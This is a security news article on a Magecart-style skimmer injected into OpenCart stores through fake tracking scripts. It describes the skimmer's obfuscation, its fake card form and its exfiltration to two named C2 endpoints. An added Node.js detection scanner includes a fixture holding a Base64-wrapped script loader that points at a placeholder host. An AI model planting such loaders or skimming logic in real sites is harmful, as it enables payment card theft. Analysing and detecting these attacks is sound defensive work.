Understanding the New Magecart-Style Attack on OpenCart Websites
A recent cybersecurity threat has emerged, targeting e-commerce websites that use the OpenCart content management system (CMS). This attack is reminiscent of the well-known Magecart attacks, where malicious code is injected into websites to steal sensitive customer data. In this case, the attackers have managed to inject malware that mimics trusted tracking scripts, making it particularly difficult to detect.
The malware is hidden within analytics tags and marketing scripts such as Facebook Pixel, Meta Pixel, and Google Tag Manager. These are commonly used by legitimate businesses to track user behavior and improve their online presence. However, in this instance, the scripts have been tampered with to serve a different purpose: stealing user information.
Obfuscation Techniques and Script Injection
One of the key methods used by the attackers is obfuscation, which makes it harder for security tools to identify malicious code. The malicious JavaScript is Base64-encoded and loaded from suspicious domains, for example via a script at /tagscart.shop/cdn/analytics.min.js. At first glance the script looks like a standard Google Analytics or Tag Manager loader, but closer inspection reveals its true nature.
Once decoded and executed, the script dynamically creates a new element and inserts it before the existing scripts on the page, so the additional code runs without triggering immediate alerts. That second-stage code is itself heavily obfuscated, using hexadecimal references, array recombination, and the eval() function for dynamic decoding.
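The loader indicators described above (a Base64-wrapped payload passed to eval(), hex-escaped strings, a dynamically created script element inserted before existing scripts, and a script host outside the site's known tag vendors) can be checked statically before a page ships. The Node.js scanner below is an added example, not code from the article or from any vendor it mentions; the trusted-host allowlist and the sample HTML, including the placeholder host tags-placeholder.invalid, are constructed for this example.

```javascript
// Added example (not code from the article or from c/side): a static scanner for
// the loader indicators described above. Node.js; allowlist and sample HTML are constructed.
const TRUSTED_HOSTS = new Set(['www.googletagmanager.com', 'www.google-analytics.com', 'connect.facebook.net']);
const URL_LITERAL = /["'](?:https?:)?\/\/([^/'"\s]+)/gi;  // quoted "//host/..." or "https://host/..."
// Hosts referenced by quoted URL literals in a piece of text, lowercased.
function hostsIn(text) {
  return new Set([...text.matchAll(URL_LITERAL)].map(m => m[1].toLowerCase()));
}
const untrustedIn = text => [...hostsIn(text)].filter(h => !TRUSTED_HOSTS.has(h));
// Split HTML into script tags: src for external scripts, body for inline ones.
function extractScripts(html) {
  return [...html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)].map(m => {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    return { src: src ? src[1] : null, body: m[2] };
  });
}
// Indicators found in one script (empty array = nothing suspicious).
function analyzeScript({ src, body }) {
  const hits = [];
  if (src) for (const h of untrustedIn(`"${src}"`)) hits.push(`untrusted-src:${h}`);
  if (/\beval\s*\(/.test(body)) hits.push('eval');
  if (/(\\x[0-9a-f]{2}){4,}/i.test(body)) hits.push('hex-escaped-strings');
  // Decode atob("...") literals so a Base64-wrapped loader is inspected as well.
  for (const m of body.matchAll(/atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g)) {
    hits.push('base64-decode');
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/createElement\(\s*["']script["']\s*\)/.test(decoded) && /insertBefore|appendChild/.test(decoded)) {
      hits.push('decoded-script-loader');
    }
    for (const h of untrustedIn(decoded)) hits.push(`decoded-untrusted-host:${h}`);
  }
  for (const h of untrustedIn(body)) hits.push(`untrusted-host:${h}`);
  return hits;
}
// Scan a page; returns only the scripts that raised at least one indicator.
function scanHtml(html) {
  return extractScripts(html).map((s, i) => ({ index: i, src: s.src, hits: analyzeScript(s) }))
    .filter(r => r.hits.length > 0);
}
// Constructed fixture: a legitimate GTM tag plus a Base64-wrapped loader that inserts
// a script from a placeholder host before the first existing script.
const LOADER = 'var s=document.createElement("script");s.src="//tags-placeholder.invalid/cdn/analytics.min.js";' +
  'var f=document.getElementsByTagName("script")[0];f.parentNode.insertBefore(s,f);';
const SAMPLE_HTML = `<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script>eval(atob("${Buffer.from(LOADER).toString('base64')}"));</script>
</head></html>`;
console.log(JSON.stringify(scanHtml(SAMPLE_HTML)));
```

The GTM tag passes silently while the inline script is reported with four indicators; in practice the allowlist should be the exact set of tag vendors the store has approved, and a diff of this output against a known-good baseline of the checkout page is what turns the scan into an alert.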
Fake Payment Forms and Data Exfiltration
The primary function of this script is to inject a fake credit card form during checkout. The form is designed to look legitimate and captures the card number, expiration date, and CVC fields. Event listeners for blur, keydown, and paste ensure that every piece of user input is captured.
Notably, the attack does not rely on clipboard scraping, so it depends on users entering their card details manually. After submission, the stolen data is immediately exfiltrated via POST requests to two command-and-control (C2) domains: //ultracart[.]shop/g.php and //hxjet.pics/g.php.
In an added twist, the original payment form is hidden once the card information is submitted. A second page then prompts users to enter further bank transaction details, compounding the threat.
Delayed Use of Stolen Card Data
What sets this attack apart is the unusually long delay in using the stolen card data. Instead of being used within a few days, as is typical, the data was utilized several months after the breach. One card was used on June 18 in a pay-by-phone transaction from the US, while another was charged €47.80 to an unidentified vendor.
This delay highlights the sophistication of the attack and the potential for prolonged damage. It also underscores the need for stronger security measures beyond basic firewalls.
The Growing Risk in SaaS-Based E-Commerce
This breach demonstrates the growing risk in SaaS-based e-commerce, where CMS platforms like OpenCart become soft targets for advanced malware. As more businesses rely on these platforms, the importance of robust security measures cannot be overstated.
Automated platforms like c/side claim to detect threats by identifying obfuscated JavaScript, unauthorized form injections, and anomalous script behavior. As attackers continue to evolve, even small CMS deployments must remain vigilant. Real-time monitoring and threat intelligence should no longer be optional for e-commerce vendors seeking to secure their customers’ trust.
Recommendations for E-Commerce Vendors
To protect against such threats, e-commerce vendors should consider implementing the following measures:
- Regularly update and patch their CMS and any third-party plugins.
- Monitor for unusual activity, including unexpected script behavior.
- Implement real-time monitoring tools that can detect obfuscated JavaScript and unauthorized form injections.
- Educate employees and developers about the risks of malware and how to identify suspicious activity.
- Stay informed about the latest cybersecurity trends and threats.
By taking these steps, e-commerce businesses can better defend themselves against increasingly sophisticated attacks and protect their customers’ sensitive information.